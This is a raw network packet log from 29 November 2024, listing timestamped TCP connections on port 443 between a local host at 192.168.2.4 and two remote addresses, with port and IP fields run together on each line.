                              Nov 29, 2024 15:59:16.352895021 CET4434978613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:16.466434956 CET4434977813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:16.466504097 CET4434977813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:16.466666937 CET49778443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:16.466784000 CET49778443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:16.466803074 CET4434977813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:16.466814041 CET49778443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:16.466818094 CET4434977813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:16.469533920 CET49787443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:16.469615936 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:16.469695091 CET49787443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:16.469836950 CET49787443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:16.469863892 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.694746971 CET44349782172.217.21.36192.168.2.4
                              Nov 29, 2024 15:59:17.695103884 CET49782443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:59:17.695130110 CET44349782172.217.21.36192.168.2.4
                              Nov 29, 2024 15:59:17.695405006 CET44349782172.217.21.36192.168.2.4
                              Nov 29, 2024 15:59:17.695795059 CET49782443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:59:17.695842981 CET44349782172.217.21.36192.168.2.4
                              Nov 29, 2024 15:59:17.740978003 CET49782443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:59:17.824806929 CET4434978313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.825303078 CET49783443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:17.825333118 CET4434978313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.825861931 CET49783443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:17.825866938 CET4434978313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.897118092 CET4434978413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.897711039 CET49784443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:17.897737980 CET4434978413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.898420095 CET49784443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:17.898425102 CET4434978413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.902791977 CET4434978513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.903079033 CET49785443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:17.903109074 CET4434978513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:17.903625011 CET49785443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:17.903630972 CET4434978513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.140331984 CET4434978613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.141083002 CET49786443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.141108036 CET4434978613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.141459942 CET49786443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.141464949 CET4434978613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.272344112 CET4434978313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.272409916 CET4434978313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.272569895 CET49783443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.272695065 CET49783443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.272695065 CET49783443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.272744894 CET4434978313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.272769928 CET4434978313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.275513887 CET49788443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.275556087 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.275638103 CET49788443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.275799036 CET49788443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.275810957 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.322127104 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.322624922 CET49787443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.322652102 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.322968960 CET49787443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.322974920 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.343662977 CET4434978413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.343715906 CET4434978413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.343869925 CET49784443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.343902111 CET49784443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.343919039 CET4434978413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.343951941 CET49784443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.343956947 CET4434978413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.346291065 CET49789443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.346338034 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.346409082 CET49789443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.346571922 CET49789443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.346587896 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.347182989 CET4434978513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.347275972 CET4434978513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.347330093 CET49785443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.347362995 CET49785443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.347362995 CET49785443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.347379923 CET4434978513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.347388983 CET4434978513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.349603891 CET49790443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.349626064 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.349689960 CET49790443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.349801064 CET49790443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.349812984 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.584431887 CET4434978613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.584497929 CET4434978613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.584567070 CET49786443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.584896088 CET49786443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.584896088 CET49786443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.584916115 CET4434978613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.584930897 CET4434978613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.587670088 CET49791443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.587712049 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.587785006 CET49791443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.587959051 CET49791443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.587970018 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.802249908 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.802329063 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.802613974 CET49787443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.802726030 CET49787443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.802758932 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.802773952 CET49787443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.802781105 CET4434978713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.806204081 CET49792443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.806260109 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:18.806345940 CET49792443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.806554079 CET49792443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:18.806566954 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:19.915045977 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:59:19.915138960 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:59:19.915189981 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:59:20.099416018 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.100008011 CET49788443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.100039005 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.100545883 CET49788443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.100550890 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.114789963 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.115170002 CET49789443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.115186930 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.115714073 CET49789443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.115720034 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.379770041 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.380675077 CET49790443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.380702019 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.381014109 CET49790443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.381019115 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.534714937 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.534794092 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.534868956 CET49788443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.535041094 CET49788443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.535062075 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.535074949 CET49788443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.535079956 CET4434978813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.538116932 CET49793443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.538216114 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.538300037 CET49793443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.538440943 CET49793443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.538479090 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.550467968 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.550537109 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.550591946 CET49789443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.550798893 CET49789443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.550798893 CET49789443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.550820112 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.550827980 CET4434978913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.552774906 CET49794443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.552815914 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.552891970 CET49794443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.553066969 CET49794443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.553081036 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.752295971 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.752784014 CET49792443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.752811909 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.753381968 CET49792443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.753387928 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.869246960 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.869319916 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.869474888 CET49790443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.869581938 CET49790443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.869596004 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.869606018 CET49790443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.869611025 CET4434979013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.872445107 CET49795443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.872493982 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:20.872569084 CET49795443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.872745991 CET49795443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:20.872756004 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:21.205955029 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:21.206017971 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:21.206213951 CET49792443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:21.206321955 CET49792443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:21.206341028 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:21.206351995 CET49792443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:21.206357002 CET4434979213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:21.209528923 CET49796443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:21.209567070 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:21.209636927 CET49796443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:21.209841013 CET49796443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:21.209850073 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.734863997 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.735389948 CET49793443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:22.735429049 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.735887051 CET49793443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:22.735893011 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.737953901 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.738295078 CET49794443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:22.738317966 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.738794088 CET49794443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:22.738797903 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.860708952 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.861315966 CET49795443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:22.861392021 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:22.861644030 CET49795443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:22.861656904 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.188716888 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.188790083 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.188937902 CET49793443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.189024925 CET49793443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.189043045 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.189054012 CET49793443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.189059019 CET4434979313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.191849947 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.191914082 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.191941023 CET49797443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.191962957 CET49794443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.191978931 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.192043066 CET49797443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.192162991 CET49797443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.192173958 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.192193985 CET49794443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.192210913 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.192235947 CET49794443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.192240000 CET4434979413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.194166899 CET49798443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.194204092 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.194278955 CET49798443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.194449902 CET49798443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.194458008 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.248543024 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.248977900 CET49796443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.249010086 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.249440908 CET49796443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.249447107 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.296184063 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.296276093 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.296350956 CET49795443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.296576977 CET49795443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.296576977 CET49795443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.296626091 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.296653986 CET4434979513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.299113989 CET49799443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.299146891 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.299226999 CET49799443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.299371004 CET49799443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.299381018 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.719974995 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.720042944 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.720118046 CET49796443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.720478058 CET49796443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.720478058 CET49796443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.720496893 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.720505953 CET4434979613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.723407030 CET49800443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.723444939 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:23.723530054 CET49800443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.723717928 CET49800443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:23.723728895 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:24.639966965 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:24.640825033 CET49791443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:24.640846968 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:24.641211033 CET49791443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:24.641216993 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.053126097 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.054054976 CET49798443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.054085970 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.054414988 CET49798443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.054419041 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.094541073 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.094693899 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.094794035 CET49791443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.095292091 CET49791443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.095292091 CET49791443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.095316887 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.095329046 CET4434979113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.098052979 CET49801443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.098088980 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.098169088 CET49801443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.098329067 CET49801443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.098337889 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.220659971 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.221582890 CET49799443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.221600056 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.221937895 CET49799443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.221945047 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.540214062 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.540803909 CET49800443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.540836096 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.541131973 CET49800443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.541136026 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.577004910 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.577076912 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.577150106 CET49798443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.577512980 CET49798443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.577512980 CET49798443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.577533960 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.577543020 CET4434979813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.580281019 CET49802443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.580315113 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.580406904 CET49802443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.580576897 CET49802443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.580585003 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.665596008 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.665674925 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.665771008 CET49799443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.666069984 CET49799443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.666069984 CET49799443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.666086912 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.666095972 CET4434979913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.668901920 CET49803443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.668958902 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.669054031 CET49803443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.669219017 CET49803443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.669229984 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.777143002 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.777582884 CET49797443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.777605057 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:25.778023958 CET49797443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:25.778029919 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:26.059818029 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:26.059900045 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:26.060079098 CET49800443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:26.060420990 CET49800443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:26.060441017 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:26.060451984 CET49800443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:26.060456991 CET4434980013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:26.063246965 CET49804443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:26.063287020 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:26.063366890 CET49804443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:26.063520908 CET49804443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:26.063529968 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.097755909 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.098232031 CET49801443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.098257065 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.098655939 CET49801443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.098670959 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.425848961 CET44349782172.217.21.36192.168.2.4
                              Nov 29, 2024 15:59:27.425909042 CET44349782172.217.21.36192.168.2.4
                              Nov 29, 2024 15:59:27.426104069 CET49782443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:59:27.550697088 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.551419020 CET49803443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.551457882 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.551762104 CET49803443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.551767111 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.561116934 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.561220884 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.561316967 CET49801443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.561611891 CET49801443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.561611891 CET49801443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.561626911 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.561633110 CET4434980113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.564239025 CET49805443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.564295053 CET4434980513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.564377069 CET49805443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.564524889 CET49805443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.564546108 CET4434980513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.585969925 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.586725950 CET49802443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.586755991 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.586996078 CET49802443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.586998940 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.915244102 CET49782443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:59:27.915333986 CET44349782172.217.21.36192.168.2.4
                              Nov 29, 2024 15:59:27.986407995 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.986486912 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.986710072 CET49803443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.986965895 CET49803443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.986998081 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.987015009 CET49803443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.987020016 CET4434980313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.989644051 CET49806443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.989687920 CET4434980613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:27.989758015 CET49806443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.989892960 CET49806443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:27.989906073 CET4434980613.107.246.63192.168.2.4
